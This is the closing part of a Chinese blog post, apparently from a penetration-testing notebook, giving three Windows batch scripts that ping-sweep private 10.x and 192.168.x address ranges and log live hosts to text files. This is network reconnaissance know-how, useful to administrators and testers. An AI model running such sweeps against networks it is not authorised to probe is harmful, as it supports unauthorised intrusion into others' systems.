<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">rem a段探测</span><br><span class="line">@echo off</span><br><span class="line"></span><br><span class="line">rem 修改ip的值以指定a段</span><br><span class="line"></span><br><span class="line">setlocal enabledelayedexpansion</span><br><span class="line"></span><br><span class="line">set ip&#x3D;10</span><br><span class="line"></span><br><span class="line">for &#x2F;l %%i in (0,1,255) do (</span><br><span class="line"></span><br><span class="line">for &#x2F;l %%k in (0,1,255) do (</span><br><span class="line"></span><br><span class="line">for %%j in (1,254) do ( @ping %ip%.%%i.%%k.%%j -w 1 -n 1|find &#x2F;i &quot;ttl&#x3D;&quot; &gt;&gt; null</span><br><span class="line">if !errorlevel! equ 0 (echo %ip%.%%i.%%k.%%j is alive ! &gt;&gt; ascan.txt ) else (echo %ip%.%%i.%%k.%%j May be not exist ! )</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">exit</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">rem b段探测</span><br><span class="line">@echo off</span><br><span class="line">setlocal enabledelayedexpansion</span><br><span class="line"></span><br><span class="line">set ip&#x3D;192.168</span><br><span class="line"></span><br><span class="line">for &#x2F;l %%i in (0,1,255) do (</span><br><span class="line"></span><br><span class="line">for %%k in (1,254) do ( @ping %ip%.%%i.%%k -w 1 -n 1|find &#x2F;i &quot;ttl&#x3D;&quot; &gt;&gt; null</span><br><span class="line">if !errorlevel! equ 0 (echo %ip%.%%i.%%k is alive ! &gt;&gt; bscan.txt ) else (echo %ip%.%%i.%%k May be not exist ! )</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">exit</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">rem c段探测</span><br><span class="line">@echo off</span><br><span class="line"></span><br><span class="line">setlocal enabledelayedexpansion</span><br><span class="line"></span><br><span class="line">set ip&#x3D;192.168.148</span><br><span class="line"></span><br><span class="line">for &#x2F;l %%k in (0,1,254) do  (</span><br><span class="line">@ping %ip%.%%k -w 1 -n 1| findstr &quot;TTL&#x3D;&quot; &gt;nul</span><br><span class="line">if !errorlevel! equ 0 (echo %ip%.%%k is alive ! &gt;&gt; cscan.txt ) else (echo %ip%.%%k May be not exist ! )</span><br><span class="line">)</span><br><span class="line">pause</span><br></pre></td></tr></table></figure>
<h2 id="以上"><a href="#以上" class="headerlink" title="以上"></a>以上</h2>
    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Windows/" rel="tag"># Windows</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/01/14/Windows%E6%8A%93%E5%AF%86%E7%A0%81%E7%9A%84%E5%87%A0%E7%A7%8D%E6%96%B9%E5%BC%8F/" rel="prev" title="在Windows中抓密码">
                  <i class="fa fa-chevron-left"></i> 在Windows中抓密码
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/01/14/Web%E7%9A%84%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/" rel="next" title="Web的信息搜集">
                  Web的信息搜集 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>







<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">nicaishui</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">30k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">28 分钟</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class=""></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class=""></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="/js/local-search.js"></script>






  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
